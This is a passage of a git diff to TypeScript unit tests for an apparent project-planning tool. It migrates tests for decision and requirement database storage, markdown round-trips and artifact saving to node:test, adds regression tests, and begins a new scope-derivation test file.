+    const activeOnly = SAMPLE_REQUIREMENTS.filter(r => r.status === 'active');
+    const md = generateRequirementsMd(activeOnly);
+    assert.ok(md.includes('## Active'), 'has Active section');
+    assert.ok(!md.includes('## Validated'), 'no Validated section when no validated reqs');
+    assert.ok(!md.includes('## Deferred'), 'no Deferred section when no deferred reqs');
+    assert.ok(!md.includes('## Out of Scope'), 'no Out of Scope section when no out-of-scope reqs');
+  });
 
-// ═══════════════════════════════════════════════════════════════════════════
-// saveDecisionToDb Tests
-// ═══════════════════════════════════════════════════════════════════════════
+  test('generateRequirementsMd empty input', () => {
+    const md = generateRequirementsMd([]);
+    const parsed = parseRequirementsSections(md);
+    assert.deepStrictEqual(parsed.length, 0, 'empty requirements produces empty parse');
+  });
 
-console.log('\n── saveDecisionToDb ──');
+  // ═══════════════════════════════════════════════════════════════════════════
+  // nextDecisionId Tests
+  // ═══════════════════════════════════════════════════════════════════════════
 
-{
-  const tmpDir = makeTmpDir();
-  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-  openDatabase(dbPath);
+  test('nextDecisionId', async () => {
+    // Open in-memory DB
+    openDatabase(':memory:');
 
-  try {
-    const result = await saveDecisionToDb({
-      scope: 'arch',
-      decision: 'Test decision',
-      choice: 'Option A',
-      rationale: 'Best option',
+    const id1 = await nextDecisionId();
+    assert.deepStrictEqual(id1, 'D001', 'first ID when no decisions exist');
+
+    // Insert some decisions
+    upsertDecision({
+      id: 'D001',
       when_context: 'M001',
-    }, tmpDir);
-
-    assertEq(result.id, 'D001', 'saveDecisionToDb returns D001 as first ID');
-
-    // Verify DB state
-    const dbDecision = getDecisionById('D001');
-    assertTrue(!!dbDecision, 'decision exists in DB after save');
-    assertEq(dbDecision?.scope, 'arch', 'DB decision has correct scope');
-    assertEq(dbDecision?.choice, 'Option A', 'DB decision has correct choice');
-
-    // Verify markdown file was written
-    const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
-    assertTrue(fs.existsSync(mdPath), 'DECISIONS.md file created');
-
-    const mdContent = fs.readFileSync(mdPath, 'utf-8');
-    assertTrue(mdContent.includes('D001'), 'DECISIONS.md contains new decision ID');
-    assertTrue(mdContent.includes('Test decision'), 'DECISIONS.md contains decision text');
-
-    // Verify round-trip of the written file
-    const parsed = parseDecisionsTable(mdContent);
-    assertEq(parsed.length, 1, 'written DECISIONS.md parses to 1 decision');
-    assertEq(parsed[0].id, 'D001', 'parsed decision has correct ID');
-
-    // Add second decision
-    const result2 = await saveDecisionToDb({
-      scope: 'impl',
-      decision: 'Second decision',
-      choice: 'Option B',
-      rationale: 'Also good',
-    }, tmpDir);
-
-    assertEq(result2.id, 'D002', 'second decision gets D002');
-
-    const mdContent2 = fs.readFileSync(mdPath, 'utf-8');
-    const parsed2 = parseDecisionsTable(mdContent2);
-    assertEq(parsed2.length, 2, 'DECISIONS.md now has 2 decisions');
-  } finally {
-    closeDatabase();
-    cleanupDir(tmpDir);
-  }
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-// updateRequirementInDb Tests
-// ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n── updateRequirementInDb ──');
-
-{
-  const tmpDir = makeTmpDir();
-  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-  openDatabase(dbPath);
-
-  try {
-    // Seed a requirement
-    upsertRequirement({
-      id: 'R001',
-      class: 'core-capability',
-      status: 'active',
-      description: 'Test requirement',
-      why: 'Testing',
-      source: 'test',
-      primary_owner: 'M001/S01',
-      supporting_slices: 'none',
-      validation: 'unmapped',
-      notes: '',
-      full_content: '',
+      scope: 'test',
+      decision: 'test decision',
+      choice: 'test choice',
+      rationale: 'test',
+      revisable: 'No',
+      made_by: 'agent',
+      superseded_by: null,
+    });
+    upsertDecision({
+      id: 'D005',
+      when_context: 'M001',
+      scope: 'test',
+      decision: 'test decision 5',
+      choice: 'test choice',
+      rationale: 'test',
+      revisable: 'No',
+      made_by: 'agent',
       superseded_by: null,
     });
 
-    // Update it
-    await updateRequirementInDb('R001', {
-      status: 'validated',
-      validation: 'S01 — all tests pass',
-      notes: 'Validated in S01',
-    }, tmpDir);
+    const id2 = await nextDecisionId();
+    assert.deepStrictEqual(id2, 'D006', 'next ID after D005 is D006');
 
-    // Verify DB state
-    const updated = getRequirementById('R001');
-    assertTrue(!!updated, 'requirement still exists after update');
-    assertEq(updated?.status, 'validated', 'status updated in DB');
-    assertEq(updated?.validation, 'S01 — all tests pass', 'validation updated in DB');
-    assertEq(updated?.description, 'Test requirement', 'description preserved after update');
-
-    // Verify markdown file was written
-    const mdPath = path.join(tmpDir, '.gsd', 'REQUIREMENTS.md');
-    assertTrue(fs.existsSync(mdPath), 'REQUIREMENTS.md file created');
-
-    const mdContent = fs.readFileSync(mdPath, 'utf-8');
-    assertTrue(mdContent.includes('R001'), 'REQUIREMENTS.md contains requirement ID');
-    assertTrue(mdContent.includes('validated'), 'REQUIREMENTS.md shows updated status');
-
-    // Verify round-trip
-    const parsed = parseRequirementsSections(mdContent);
-    assertEq(parsed.length, 1, 'parsed 1 requirement from written file');
-    assertEq(parsed[0].status, 'validated', 'parsed status matches update');
-  } finally {
     closeDatabase();
-    cleanupDir(tmpDir);
-  }
-}
+  });
 
-console.log('\n── updateRequirementInDb — not found ──');
+  // ═══════════════════════════════════════════════════════════════════════════
+  // saveDecisionToDb Tests
+  // ═══════════════════════════════════════════════════════════════════════════
 
-{
-  const tmpDir = makeTmpDir();
-  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-  openDatabase(dbPath);
+  test('saveDecisionToDb', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
 
-  try {
-    let threw = false;
     try {
+      const result = await saveDecisionToDb({
+        scope: 'arch',
+        decision: 'Test decision',
+        choice: 'Option A',
+        rationale: 'Best option',
+        when_context: 'M001',
+      }, tmpDir);
+
+      assert.deepStrictEqual(result.id, 'D001', 'saveDecisionToDb returns D001 as first ID');
+
+      // Verify DB state
+      const dbDecision = getDecisionById('D001');
+      assert.ok(!!dbDecision, 'decision exists in DB after save');
+      assert.deepStrictEqual(dbDecision?.scope, 'arch', 'DB decision has correct scope');
+      assert.deepStrictEqual(dbDecision?.choice, 'Option A', 'DB decision has correct choice');
+
+      // Verify markdown file was written
+      const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
+      assert.ok(fs.existsSync(mdPath), 'DECISIONS.md file created');
+
+      const mdContent = fs.readFileSync(mdPath, 'utf-8');
+      assert.ok(mdContent.includes('D001'), 'DECISIONS.md contains new decision ID');
+      assert.ok(mdContent.includes('Test decision'), 'DECISIONS.md contains decision text');
+
+      // Verify round-trip of the written file
+      const parsed = parseDecisionsTable(mdContent);
+      assert.deepStrictEqual(parsed.length, 1, 'written DECISIONS.md parses to 1 decision');
+      assert.deepStrictEqual(parsed[0].id, 'D001', 'parsed decision has correct ID');
+
+      // Add second decision
+      const result2 = await saveDecisionToDb({
+        scope: 'impl',
+        decision: 'Second decision',
+        choice: 'Option B',
+        rationale: 'Also good',
+      }, tmpDir);
+
+      assert.deepStrictEqual(result2.id, 'D002', 'second decision gets D002');
+
+      const mdContent2 = fs.readFileSync(mdPath, 'utf-8');
+      const parsed2 = parseDecisionsTable(mdContent2);
+      assert.deepStrictEqual(parsed2.length, 2, 'DECISIONS.md now has 2 decisions');
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // Parallel save race condition regression (#3326, #3339, #3459)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('parallel saveDecisionToDb calls produce unique IDs', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      // Fire 5 saves concurrently — before the fix, all would get D001
+      const results = await Promise.all([
+        saveDecisionToDb({ scope: 'a', decision: 'd1', choice: 'c1', rationale: 'r1' }, tmpDir),
+        saveDecisionToDb({ scope: 'b', decision: 'd2', choice: 'c2', rationale: 'r2' }, tmpDir),
+        saveDecisionToDb({ scope: 'c', decision: 'd3', choice: 'c3', rationale: 'r3' }, tmpDir),
+        saveDecisionToDb({ scope: 'd', decision: 'd4', choice: 'c4', rationale: 'r4' }, tmpDir),
+        saveDecisionToDb({ scope: 'e', decision: 'd5', choice: 'c5', rationale: 'r5' }, tmpDir),
+      ]);
+
+      const ids = results.map((r) => r.id);
+      const uniqueIds = new Set(ids);
+
+      // All 5 IDs must be unique
+      assert.equal(uniqueIds.size, 5, `Expected 5 unique IDs, got ${uniqueIds.size}: ${ids.join(', ')}`);
+
+      // IDs should be D001-D005 (order may vary due to concurrency)
+      for (const id of ids) {
+        assert.match(id, /^D\d{3}$/, `ID ${id} should match D### pattern`);
+      }
+
+      // Verify all 5 exist in DB
+      for (const id of ids) {
+        const row = getDecisionById(id);
+        assert.ok(row, `Decision ${id} should exist in DB`);
+      }
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // updateRequirementInDb Tests
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('updateRequirementInDb', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      // Seed a requirement
+      upsertRequirement({
+        id: 'R001',
+        class: 'core-capability',
+        status: 'active',
+        description: 'Test requirement',
+        why: 'Testing',
+        source: 'test',
+        primary_owner: 'M001/S01',
+        supporting_slices: 'none',
+        validation: 'unmapped',
+        notes: '',
+        full_content: '',
+        superseded_by: null,
+      });
+
+      // Update it
+      await updateRequirementInDb('R001', {
+        status: 'validated',
+        validation: 'S01 — all tests pass',
+        notes: 'Validated in S01',
+      }, tmpDir);
+
+      // Verify DB state
+      const updated = getRequirementById('R001');
+      assert.ok(!!updated, 'requirement still exists after update');
+      assert.deepStrictEqual(updated?.status, 'validated', 'status updated in DB');
+      assert.deepStrictEqual(updated?.validation, 'S01 — all tests pass', 'validation updated in DB');
+      assert.deepStrictEqual(updated?.description, 'Test requirement', 'description preserved after update');
+
+      // Verify markdown file was written
+      const mdPath = path.join(tmpDir, '.gsd', 'REQUIREMENTS.md');
+      assert.ok(fs.existsSync(mdPath), 'REQUIREMENTS.md file created');
+
+      const mdContent = fs.readFileSync(mdPath, 'utf-8');
+      assert.ok(mdContent.includes('R001'), 'REQUIREMENTS.md contains requirement ID');
+      assert.ok(mdContent.includes('validated'), 'REQUIREMENTS.md shows updated status');
+
+      // Verify round-trip
+      const parsed = parseRequirementsSections(mdContent);
+      assert.deepStrictEqual(parsed.length, 1, 'parsed 1 requirement from written file');
+      assert.deepStrictEqual(parsed[0].status, 'validated', 'parsed status matches update');
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('updateRequirementInDb — upserts when not found (#2919)', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      // Previously threw; now upserts a skeleton requirement with the provided updates
       await updateRequirementInDb('R999', { status: 'validated' }, tmpDir);
-    } catch (err) {
-      threw = true;
-      assertTrue(
-        (err as Error).message.includes('R999'),
-        'error message mentions the missing ID',
+      const created = getRequirementById('R999');
+      assert.ok(created !== null, 'R999 should be created by upsert');
+      assert.deepStrictEqual(created!.status, 'validated', 'Upserted requirement should have validated status');
+      assert.deepStrictEqual(created!.id, 'R999', 'Upserted requirement should keep the provided ID');
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('updateRequirementInDb — seeds from REQUIREMENTS.md when DB empty (#3346)', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      // Write a REQUIREMENTS.md with real content (simulating discussion phase output)
+      const reqContent = [
+        '# Requirements',
+        '',
+        '## Active',
+        '',
+        '### R005 — User authentication',
+        '- Class: functional',
+        '- Why: Users need secure access',
+        '- Source: user-research',
+        '- Primary owner: M001/S02',
+        '',
+        '### R007 — API rate limiting',
+        '- Class: non-functional',
+        '- Why: Prevent abuse',
+        '- Source: architecture',
+        '- Primary owner: M001/S03',
+        '',
+        '## Validated',
+        '',
+        '### R001 — Database schema',
+        '- Class: functional',
+        '- Why: Foundation for storage',
+        '- Source: design',
+        '- Validation: S01 verified',
+      ].join('\n');
+      fs.writeFileSync(path.join(tmpDir, '.gsd', 'REQUIREMENTS.md'), reqContent);
+
+      // DB is empty — no requirements seeded. Update R005 to "validated".
+      // Before #3346 fix: this would create a skeleton with empty fields.
+      // After fix: this seeds all 3 requirements from REQUIREMENTS.md first.
+      await updateRequirementInDb('R005', {
+        status: 'validated',
+        validation: 'S02 — auth flow verified',
+      }, tmpDir);
+
+      // R005 should have the update AND the original content from markdown
+      const r005 = getRequirementById('R005');
+      assert.ok(r005, 'R005 should exist');
+      assert.equal(r005!.status, 'validated', 'status should be updated');
+      assert.equal(r005!.validation, 'S02 — auth flow verified', 'validation should be updated');
+      assert.equal(r005!.class, 'functional', 'class should be preserved from REQUIREMENTS.md');
+      assert.ok(r005!.description?.includes('authentication') || r005!.full_content?.includes('authentication'),
+        'original content should be preserved');
+
+      // R007 and R001 should also be seeded (not just the one being updated)
+      const r007 = getRequirementById('R007');
+      assert.ok(r007, 'R007 should be seeded from REQUIREMENTS.md');
+      assert.equal(r007!.status, 'active', 'R007 status should be active');
+
+      const r001 = getRequirementById('R001');
+      assert.ok(r001, 'R001 should be seeded from REQUIREMENTS.md');
+      assert.equal(r001!.status, 'validated', 'R001 status should be validated (from section heading)');
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // saveArtifactToDb Tests
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('saveArtifactToDb', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      const content = '# Task Summary\n\nTest content\n';
+      await saveArtifactToDb({
+        path: 'milestones/M001/slices/S06/tasks/T01-SUMMARY.md',
+        artifact_type: 'SUMMARY',
+        content,
+        milestone_id: 'M001',
+        slice_id: 'S06',
+        task_id: 'T01',
+      }, tmpDir);
+
+      // Verify DB state
+      const adapter = _getAdapter();
+      assert.ok(!!adapter, 'adapter available');
+      const row = adapter!
+        .prepare('SELECT * FROM artifacts WHERE path = ?')
+        .get('milestones/M001/slices/S06/tasks/T01-SUMMARY.md');
+      assert.ok(!!row, 'artifact exists in DB');
+      assert.deepStrictEqual(row!['artifact_type'], 'SUMMARY', 'artifact type correct in DB');
+      assert.deepStrictEqual(row!['milestone_id'], 'M001', 'milestone_id correct in DB');
+      assert.deepStrictEqual(row!['slice_id'], 'S06', 'slice_id correct in DB');
+      assert.deepStrictEqual(row!['task_id'], 'T01', 'task_id correct in DB');
+
+      // Verify file on disk
+      const filePath = path.join(
+        tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S06', 'tasks', 'T01-SUMMARY.md',
       );
+      assert.ok(fs.existsSync(filePath), 'artifact file written to disk');
+      assert.deepStrictEqual(fs.readFileSync(filePath, 'utf-8'), content, 'file content matches');
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
     }
-    assertTrue(threw, 'throws when requirement not found');
-  } finally {
+  });
+
+  test('saveArtifactToDb — shrinkage guard preserves larger existing file', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      const fullContent = '# Full Research\n\n' + 'x'.repeat(20000) + '\n';
+      const abbreviatedContent = '# Summary\n\nShort version.\n';
+
+      // Pre-create the file with full content (simulating a prior `write` tool call)
+      const relPath = 'milestones/M001/M001-RESEARCH.md';
+      const filePath = path.join(tmpDir, '.gsd', relPath);
+      fs.mkdirSync(path.dirname(filePath), { recursive: true });
+      fs.writeFileSync(filePath, fullContent);
+
+      // Call saveArtifactToDb with abbreviated content — should trigger shrinkage guard
+      await saveArtifactToDb({
+        path: relPath,
+        artifact_type: 'RESEARCH',
+        content: abbreviatedContent,
+        milestone_id: 'M001',
+      }, tmpDir);
+
+      // Disk file should be preserved (not overwritten)
+      assert.deepStrictEqual(
+        fs.readFileSync(filePath, 'utf-8'),
+        fullContent,
+        'disk file preserved — shrinkage guard prevented overwrite',
+      );
+
+      // DB should contain the full disk content, not the abbreviated content
+      const adapter = _getAdapter();
+      const row = adapter!
+        .prepare('SELECT full_content FROM artifacts WHERE path = ?')
+        .get(relPath);
+      assert.deepStrictEqual(
+        row!['full_content'],
+        fullContent,
+        'DB stores the richer disk content instead of abbreviated content',
+      );
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('saveArtifactToDb — allows overwrite when new content is similar size', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    openDatabase(dbPath);
+
+    try {
+      const oldContent = '# Summary v1\n\nOriginal content here.\n';
+      const newContent = '# Summary v2\n\nUpdated content here with more details.\n';
+
+      const relPath = 'milestones/M001/M001-SUMMARY.md';
+      const filePath = path.join(tmpDir, '.gsd', relPath);
+      fs.mkdirSync(path.dirname(filePath), { recursive: true });
+      fs.writeFileSync(filePath, oldContent);
+
+      await saveArtifactToDb({
+        path: relPath,
+        artifact_type: 'SUMMARY',
+        content: newContent,
+        milestone_id: 'M001',
+      }, tmpDir);
+
+      // Disk file should be updated (new content is >=50% of old size)
+      assert.deepStrictEqual(
+        fs.readFileSync(filePath, 'utf-8'),
+        newContent,
+        'disk file updated when new content is similar size',
+      );
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // Full Round-Trip: DB → Markdown → Parse → Compare
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('Full DB round-trip: decisions', () => {
+    openDatabase(':memory:');
+
+    // Insert via DB
+    for (const d of SAMPLE_DECISIONS) {
+      upsertDecision({
+        id: d.id,
+        when_context: d.when_context,
+        scope: d.scope,
+        decision: d.decision,
+        choice: d.choice,
+        rationale: d.rationale,
+        revisable: d.revisable,
+        made_by: d.made_by,
+        superseded_by: d.superseded_by,
+      });
+    }
+
+    // Generate markdown from DB state
+    const adapter = _getAdapter()!;
+    const rows = adapter.prepare('SELECT * FROM decisions ORDER BY seq').all();
+    const dbDecisions: Decision[] = rows.map(row => ({
+      seq: row['seq'] as number,
+      id: row['id'] as string,
+      when_context: row['when_context'] as string,
+      scope: row['scope'] as string,
+      decision: row['decision'] as string,
+      choice: row['choice'] as string,
+      rationale: row['rationale'] as string,
+      revisable: row['revisable'] as string,
+      made_by: (row['made_by'] as string as import('../types.js').DecisionMadeBy) ?? 'agent',
+      superseded_by: (row['superseded_by'] as string) ?? null,
+    }));
+
+    const md = generateDecisionsMd(dbDecisions);
+    const parsed = parseDecisionsTable(md);
+
+    assert.deepStrictEqual(parsed.length, SAMPLE_DECISIONS.length, 'DB round-trip decision count');
+    for (const orig of SAMPLE_DECISIONS) {
+      const rt = parsed.find(p => p.id === orig.id);
+      assert.ok(!!rt, `DB round-trip: ${orig.id} found`);
+      if (rt) {
+        assert.deepStrictEqual(rt.scope, orig.scope, `DB round-trip: ${orig.id} scope`);
+        assert.deepStrictEqual(rt.choice, orig.choice, `DB round-trip: ${orig.id} choice`);
+      }
+    }
+
     closeDatabase();
-    cleanupDir(tmpDir);
-  }
-}
+  });
 
-// ═══════════════════════════════════════════════════════════════════════════
-// saveArtifactToDb Tests
-// ═══════════════════════════════════════════════════════════════════════════
+  test('Full DB round-trip: requirements', () => {
+    openDatabase(':memory:');
 
-console.log('\n── saveArtifactToDb ──');
+    for (const r of SAMPLE_REQUIREMENTS) {
+      upsertRequirement(r);
+    }
 
-{
-  const tmpDir = makeTmpDir();
-  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-  openDatabase(dbPath);
+    const adapter = _getAdapter()!;
+    const rows = adapter.prepare('SELECT * FROM requirements ORDER BY id').all();
+    const dbReqs: Requirement[] = rows.map(row => ({
+      id: row['id'] as string,
+      class: row['class'] as string,
+      status: row['status'] as string,
+      description: row['description'] as string,
+      why: row['why'] as string,
+      source: row['source'] as string,
+      primary_owner: row['primary_owner'] as string,
+      supporting_slices: row['supporting_slices'] as string,
+      validation: row['validation'] as string,
+      notes: row['notes'] as string,
+      full_content: row['full_content'] as string,
+      superseded_by: (row['superseded_by'] as string) ?? null,
+    }));
 
-  try {
-    const content = '# Task Summary\n\nTest content\n';
-    await saveArtifactToDb({
-      path: 'milestones/M001/slices/S06/tasks/T01-SUMMARY.md',
-      artifact_type: 'SUMMARY',
-      content,
-      milestone_id: 'M001',
-      slice_id: 'S06',
-      task_id: 'T01',
-    }, tmpDir);
+    const md = generateRequirementsMd(dbReqs);
+    const parsed = parseRequirementsSections(md);
 
-    // Verify DB state
-    const adapter = _getAdapter();
-    assertTrue(!!adapter, 'adapter available');
-    const row = adapter!
-      .prepare('SELECT * FROM artifacts WHERE path = ?')
-      .get('milestones/M001/slices/S06/tasks/T01-SUMMARY.md');
-    assertTrue(!!row, 'artifact exists in DB');
-    assertEq(row!['artifact_type'], 'SUMMARY', 'artifact type correct in DB');
-    assertEq(row!['milestone_id'], 'M001', 'milestone_id correct in DB');
-    assertEq(row!['slice_id'], 'S06', 'slice_id correct in DB');
-    assertEq(row!['task_id'], 'T01', 'task_id correct in DB');
+    assert.deepStrictEqual(parsed.length, SAMPLE_REQUIREMENTS.length, 'DB round-trip requirement count');
+    for (const orig of SAMPLE_REQUIREMENTS) {
+      const rt = parsed.find(p => p.id === orig.id);
+      assert.ok(!!rt, `DB round-trip: ${orig.id} found`);
+      if (rt) {
+        assert.deepStrictEqual(rt.class, orig.class, `DB round-trip: ${orig.id} class`);
+        assert.deepStrictEqual(rt.description, orig.description, `DB round-trip: ${orig.id} description`);
+      }
+    }
 
-    // Verify file on disk
-    const filePath = path.join(
-      tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S06', 'tasks', 'T01-SUMMARY.md',
-    );
-    assertTrue(fs.existsSync(filePath), 'artifact file written to disk');
-    assertEq(fs.readFileSync(filePath, 'utf-8'), content, 'file content matches');
-  } finally {
     closeDatabase();
-    cleanupDir(tmpDir);
-  }
-}
+  });
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Full Round-Trip: DB → Markdown → Parse → Compare
-// ═══════════════════════════════════════════════════════════════════════════
+  // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n── Full DB round-trip: decisions ──');
+  // ═══════════════════════════════════════════════════════════════════════════
+  //  extractDeferredSliceRef
+  // ═══════════════════════════════════════════════════════════════════════════
 
-{
-  openDatabase(':memory:');
-
-  // Insert via DB
-  for (const d of SAMPLE_DECISIONS) {
-    upsertDecision({
-      id: d.id,
-      when_context: d.when_context,
-      scope: d.scope,
-      decision: d.decision,
-      choice: d.choice,
-      rationale: d.rationale,
-      revisable: d.revisable,
-      made_by: d.made_by,
-      superseded_by: d.superseded_by,
+  describe('extractDeferredSliceRef', () => {
+    const fields = (scope: string, choice: string, decision: string) => ({
+      scope,
+      choice,
+      decision,
     });
-  }
 
-  // Generate markdown from DB state
-  const adapter = _getAdapter()!;
-  const rows = adapter.prepare('SELECT * FROM decisions ORDER BY seq').all();
-  const dbDecisions: Decision[] = rows.map(row => ({
-    seq: row['seq'] as number,
-    id: row['id'] as string,
-    when_context: row['when_context'] as string,
-    scope: row['scope'] as string,
-    decision: row['decision'] as string,
-    choice: row['choice'] as string,
-    rationale: row['rationale'] as string,
-    revisable: row['revisable'] as string,
-    made_by: (row['made_by'] as string as import('../types.js').DecisionMadeBy) ?? 'agent',
-    superseded_by: (row['superseded_by'] as string) ?? null,
-  }));
+    test('detects deferral in scope with M###/S## pattern in choice', () => {
+      const result = extractDeferredSliceRef(
+        fields('deferral of low-priority work', 'Move M001/S03 to backlog', ''),
+      );
+      assert.deepStrictEqual(result, { milestoneId: 'M001', sliceId: 'S03' });
+    });
 
-  const md = generateDecisionsMd(dbDecisions);
-  const parsed = parseDecisionsTable(md);
+    test('detects deferral in choice field', () => {
+      const result = extractDeferredSliceRef(
+        fields('slice prioritization', 'defer M002/S01 until next sprint', ''),
+      );
+      assert.deepStrictEqual(result, { milestoneId: 'M002', sliceId: 'S01' });
+    });
 
-  assertEq(parsed.length, SAMPLE_DECISIONS.length, 'DB round-trip decision count');
-  for (const orig of SAMPLE_DECISIONS) {
-    const rt = parsed.find(p => p.id === orig.id);
-    assertTrue(!!rt, `DB round-trip: ${orig.id} found`);
-    if (rt) {
-      assertEq(rt.scope, orig.scope, `DB round-trip: ${orig.id} scope`);
-      assertEq(rt.choice, orig.choice, `DB round-trip: ${orig.id} choice`);
-    }
-  }
+    test('detects deferral in decision field', () => {
+      const result = extractDeferredSliceRef(
+        fields('resource constraints', '', 'deferred M010/S12 pending review'),
+      );
+      assert.deepStrictEqual(result, { milestoneId: 'M010', sliceId: 'S12' });
+    });
 
-  closeDatabase();
-}
+    test('returns null when no M###/S## pattern is present', () => {
+      const result = extractDeferredSliceRef(
+        fields('deferral of work', 'will revisit later', 'deferred indefinitely'),
+      );
+      assert.strictEqual(result, null);
+    });
 
-console.log('\n── Full DB round-trip: requirements ──');
+    test('recognises "deferring" variant', () => {
+      const result = extractDeferredSliceRef(
+        fields('deferring this slice', 'M005/S02 can wait', ''),
+      );
+      assert.deepStrictEqual(result, { milestoneId: 'M005', sliceId: 'S02' });
+    });
 
-{
-  openDatabase(':memory:');
+    test('recognises "defers" variant', () => {
+      const result = extractDeferredSliceRef(
+        fields('team defers slice', 'M100/S10 not urgent', ''),
+      );
+      assert.deepStrictEqual(result, { milestoneId: 'M100', sliceId: 'S10' });
+    });
 
-  for (const r of SAMPLE_REQUIREMENTS) {
-    upsertRequirement(r);
-  }
+    test('returns first M###/S## match when multiple patterns exist', () => {
+      const result = extractDeferredSliceRef(
+        fields('', 'defer M003/S01 and M003/S02', ''),
+      );
+      assert.deepStrictEqual(result, { milestoneId: 'M003', sliceId: 'S01' });
+    });
 
-  const adapter = _getAdapter()!;
-  const rows = adapter.prepare('SELECT * FROM requirements ORDER BY id').all();
-  const dbReqs: Requirement[] = rows.map(row => ({
-    id: row['id'] as string,
-    class: row['class'] as string,
-    status: row['status'] as string,
-    description: row['description'] as string,
-    why: row['why'] as string,
-    source: row['source'] as string,
-    primary_owner: row['primary_owner'] as string,
-    supporting_slices: row['supporting_slices'] as string,
-    validation: row['validation'] as string,
-    notes: row['notes'] as string,
-    full_content: row['full_content'] as string,
-    superseded_by: (row['superseded_by'] as string) ?? null,
-  }));
+    test('returns null when no deferral keyword is present', () => {
+      const result = extractDeferredSliceRef(
+        fields('approved work', 'M001/S01 is ready', 'proceed with M001/S01'),
+      );
+      assert.strictEqual(result, null);
+    });
+  });
 
-  const md = generateRequirementsMd(dbReqs);
-  const parsed = parseRequirementsSections(md);
-
-  assertEq(parsed.length, SAMPLE_REQUIREMENTS.length, 'DB round-trip requirement count');
-  for (const orig of SAMPLE_REQUIREMENTS) {
-    const rt = parsed.find(p => p.id === orig.id);
-    assertTrue(!!rt, `DB round-trip: ${orig.id} found`);
-    if (rt) {
-      assertEq(rt.class, orig.class, `DB round-trip: ${orig.id} class`);
-      assertEq(rt.description, orig.description, `DB round-trip: ${orig.id} description`);
-    }
-  }
-
-  closeDatabase();
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/decision-scope-cascade.test.ts b/src/resources/extensions/gsd/tests/decision-scope-cascade.test.ts
new file mode 100644
index 000000000..0660a771c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/decision-scope-cascade.test.ts
@@ -0,0 +1,370 @@
+// decision-scope-cascade: Tests for R005 fallback cascade and scope derivation
+//
+// Validates:
+// (a) inlineDecisionsFromDb cascade: milestone + scope → milestone only → null
+// (b) deriveSliceScope extracts meaningful scope keywords from slice titles
+// (c) deriveSliceScope returns undefined for generic titles
+
+import { describe, test, afterEach, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  openDatabase,
+  closeDatabase,
+  isDbAvailable,
+  insertDecision,
+} from '../gsd-db.ts';
+import {
+  queryDecisions,
+  formatDecisionsForPrompt,
+} from '../context-store.ts';
+import { deriveSliceScope } from '../auto-prompts.ts';
+
+// ═══════════════════════════════════════════════════════════════════════════
+// deriveSliceScope: Extract meaningful scope from slice titles
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("deriveSliceScope: keyword extraction", () => {
+  test("extracts first meaningful noun from title", () => {
+    // "Auth Middleware & Protected Route" → "auth"
+    assert.strictEqual(
+      deriveSliceScope("Auth Middleware & Protected Route"),
+      "auth",
+      "extracts 'auth' from auth-related title",
+    );
+
+    // "Database & User Model Setup" → "database" (not "setup" which is generic)
+    const dbScope = deriveSliceScope("Database & User Model Setup");
+    assert.ok(
+      dbScope === "database" || dbScope === "user",
+      `expected 'database' or 'user', got '${dbScope}'`,
+    );
+
+    // "API Rate Limiting" → "api"
+    assert.strictEqual(
+      deriveSliceScope("API Rate Limiting"),
+      "api",
+      "extracts 'api' from API-related title",
+    );
+
+    // "Stripe Payment Integration" → "stripe"
+    assert.strictEqual(
+      deriveSliceScope("Stripe Payment Integration"),
+      "stripe",
+      "extracts 'stripe' from payment-related title",
+    );
+  });
+
